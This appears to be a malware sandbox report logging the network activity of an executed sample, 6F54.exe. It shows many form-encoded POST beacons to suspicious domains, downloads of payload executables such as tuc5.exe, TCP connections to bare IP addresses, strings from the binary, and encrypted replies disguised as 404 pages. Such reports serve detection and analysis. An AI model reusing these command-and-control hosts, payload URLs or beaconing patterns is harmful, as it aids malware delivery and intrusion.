Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://faihsbelromyvlf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: neighborhoodfeelsa.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: diagramfiremonkeyowwa.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GyrHyIPTi_TidMU0JuvSjzpzqFecFVgDDF7XZLeGalc-1703217450-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: diagramfiremonkeyowwa.fun
Source: global traffic	HTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ihedgbkpfwa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdnyqowhkcbpmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qyhismedicw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lffkmvnmvmvdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gukxtwdvplosk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbpsjibmmyknnqg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybgbelfkyelowcj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gvwgniojlhocgcel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qroajrxixmetfju.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iiuoqkufoitwlik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kajxggvgjptxg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fsivfgrcqpxdgpte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ltiksxqnkvgm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnhppaivpakuxf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vcqrjjawkuhasa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://longolbvkuo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikjddvylikyptobp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lwotexlnbpimc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nkucadnptpbcmtw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owonhhcntgkvuiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbtfvstlgslje.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nrudoammymw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lipbnoafhcmsmkuu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://njmomvbfqfwsksgl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqxrrorjhgduevs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynanrtrmnxdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://abnvvgivhdfukik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: humydrole.com

Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 188.213.49.109
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.246.170
Source: unknown	TCP traffic detected without corresponding DNS query: 188.213.49.109
Source: unknown	TCP traffic detected without corresponding DNS query: 104.57.231.27
Source: unknown	TCP traffic detected without corresponding DNS query: 104.57.231.27
Source: unknown	TCP traffic detected without corresponding DNS query: 104.57.231.27
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.144.152
Source: unknown	TCP traffic detected without corresponding DNS query: 188.213.49.109
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.144.152
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.144.152
Source: unknown	TCP traffic detected without corresponding DNS query: 188.213.49.109
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.144.152
Source: unknown	TCP traffic detected without corresponding DNS query: 188.213.49.109
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.144.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.191.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 204.13.164.118
Source: unknown	TCP traffic detected without corresponding DNS query: 5.9.43.211
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 5.9.43.211
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9
Source: unknown	TCP traffic detected without corresponding DNS query: 171.25.193.9

Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shpilliwilli.com
Source: global traffic	HTTP traffic detected: GET /dad9b3a52c30c4733cf934e71716b3dc/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: linkofstrumble.com
Source: global traffic	HTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
Source: global traffic	HTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com

Source: 6F54.exe	String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
Source: 6F54.exe	String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: onualituyrs.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aqkqgwqwxgrwmfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: sumagulituyo.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff a9 71 a2 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 76 df f5 69 21 11 14 7e 5f af 9a 30 1d c9 a0 c1 a9 dd 7a 0d b0 4f 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e ea 72 af 87 2b bd 61 f7 b5 42 bf 44 34 fd 78 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 64 9b 03 4c 49 56 ad f3 57 7b 2d ba 72 19 cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 e7 50 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 49 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 c4 2e e6 5b 1e 44 ab 1e 26 75 10 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f c0 ad df b3 99 27 98 8a cd 22 64 74 79 5c 6c 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f d0 56 ab 7a 8f b6 6c e0 cd 28 d8 37 00 52 ff 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 15 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 07 1b 76 28 1e 84 60 41 b2 d4 9b 8d 6e 47 47 4e a0 ff 72 6e 80 79 aa 47 33 4b fe cd ea b7 41 8e 02 90 05 f9 ee 9f 25 f9 b1 16 31 81 cc b5 23 43 34 dc ce c3 a8 e6 4f 95 16 79 1c 61 5f 3e a9 fe 2d a2 22 1a 5c 76 3f e8 b7 69 27 e7 6e d5 6b 6d 75 85 03 0c 04 a2 2a f7 b1 b0 14 82 99 a1 79 e7 21 f9 e3 86 cf bf b9 bd 71 d7 21 7d 4f 87 21 ee fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 8d 55 db c4 0d 13 13 ef 5b e1 92 40 8e 48 c5 90 de 4b c4 61 7e de f5 69 b9 19 17 8e 5f 